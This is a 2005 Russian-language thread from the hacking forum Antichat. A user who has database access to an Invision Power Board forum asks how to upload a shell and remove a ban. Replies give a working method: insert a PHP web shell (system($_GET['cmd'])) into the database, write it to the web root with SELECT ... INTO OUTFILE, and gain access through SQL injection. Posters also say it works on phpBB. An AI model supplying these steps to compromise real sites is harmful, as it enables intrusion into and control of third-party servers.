ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Заливка шелла и снятие бана в ipb через mysql
  #1  
Старый 24.11.2005, 20:05
Аватар для darks
darks
Новичок
Регистрация: 19.11.2005
Сообщений: 8
Провел на форуме:
19830

Репутация: 0
По умолчанию Заливка шелла и снятие бана в ipb через mysql

Есть доступ к базе ... Возможно ли как нить залить шелл через неё ? И что нужно редактить в этой базе стобы снять бан ? Я тут попытался но у меня что то не особо получилось ... Кстати форум Ipb стоит .
 
Ответить с цитированием

  #2  
Старый 24.11.2005, 20:30
Аватар для madnet
madnet
Умиротворенн
Регистрация: 09.12.2004
Сообщений: 996
Провел на форуме:
2386719

Репутация: 1384


Отправить сообщение для madnet с помощью ICQ
По умолчанию

Сначала заносим в БД запись нашего шела типа
<? system($_GET(cmd)) ?>

Потом сохраняем в файл
SELECT blabla INTO OUTFILE 'shell.php' FROM TABLE_NAME
__________________

http://madnet.name - madnet - blog | homepage (Мысли, релизы, скрипты, софт)

http://antichat.ru - Лучший сайт по безопасности
irc.antichat.ru:7771 #antichat - общение online
ГАРАНТ ФОРУМА
 
Ответить с цитированием

  #3  
Старый 24.11.2005, 21:23
Аватар для *Van*
*Van*
Постоянный
Регистрация: 14.08.2005
Сообщений: 378
Провел на форуме:
670862

Репутация: 54
Отправить сообщение для *Van* с помощью ICQ
По умолчанию

А на phpbb можно таким способом заливать шелл?
 
Ответить с цитированием

  #4  
Старый 24.11.2005, 21:39
Аватар для m0nzt3r
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463

Репутация: 2258


По умолчанию

ну пхпББ тоже на БД работает соответсвтенно можно=)
__________________
Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
 
Ответить с цитированием

  #5  
Старый 24.11.2005, 21:56
Аватар для *Van*
*Van*
Постоянный
Регистрация: 14.08.2005
Сообщений: 378
Провел на форуме:
670862

Репутация: 54
Отправить сообщение для *Van* с помощью ICQ
По умолчанию

И это будет работатьь на любых версиях?
 
Ответить с цитированием

  #6  
Старый 24.11.2005, 22:02
Аватар для milord69
milord69
Новичок
Регистрация: 24.11.2005
Сообщений: 18
Провел на форуме:
55564

Репутация: 0
По умолчанию

Цитата:
Сообщение от madnet  
Сначала заносим в БД запись нашего шела типа
<? system($_GET(cmd)) ?>

Потом сохраняем в файл
SELECT blabla INTO OUTFILE 'shell.php' FROM TABLE_NAME

Обьясни плиз немного подробнее
 
Ответить с цитированием

  #7  
Старый 24.11.2005, 22:09
Аватар для m0nzt3r
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463

Репутация: 2258


По умолчанию

Цитата:
Обьясни плиз немного подробнее
находишь СКУЛЬ иньекцию..или пробиваешься и достаешь доступ к базе.. и делаешь запрос с помощью которого добавляешь юзера(или еще чего то в базу) с содержанием <? system($_GET['cmd']; ?> а дальше по команде маднета
надеюсь понятно??
Ван, ну наверно))ведь во всех версиях есть коннект к БД =))
__________________
Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
 
Ответить с цитированием

  #8  
Старый 24.11.2005, 22:13
Аватар для milord69
milord69
Новичок
Регистрация: 24.11.2005
Сообщений: 18
Провел на форуме:
55564

Репутация: 0
По умолчанию

Цитата:
Сообщение от m0nzt3r  
находишь СКУЛЬ иньекцию..или пробиваешься и достаешь доступ к базе..
Доступ есть... Но вот дальше не понял. Если можно, то подробней плиз.
 
Ответить с цитированием

  #9  
Старый 24.11.2005, 22:37
Аватар для Rebz
Rebz
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814

Репутация: 3876


По умолчанию

Подробней - выучи команды SQL.
Insert, select хотя бы. C помощью команды insert добавь юзера.
 
Ответить с цитированием

  #10  
Старый 24.11.2005, 23:53
Аватар для qBiN
qBiN
Постоянный
Регистрация: 20.01.2005
Сообщений: 899
Провел на форуме:
1535446

Репутация: 182


Отправить сообщение для qBiN с помощью ICQ
По умолчанию

2 ВанПрошу не флудить и по-возможности не задавать однотипные а также глупые вопросы.Так же не писать по одному вопросу в сообщении,если захотел что то добавить(незначительное) то есть кнопочка редактирования сообщения.
Все выше перечисленное относится и к другим пользователям.
Настчет темы добавлю к сообщению madnet'a
SELECT `my_column` INTO OUTFILE '/path2/wwwdir/shell.php' FROM TABLE_NAME
Подчеркнутым- полный путь к файлу.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Общие Рекомендации Защиты (MySQL и SQL Web-интерфейс) k00p3r Чужие Статьи 0 13.06.2005 11:22
Защищаем MySql. Шаг за шагом k00p3r Чужие Статьи 0 13.06.2005 11:18
SQL инъекция в сервере MySQL k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ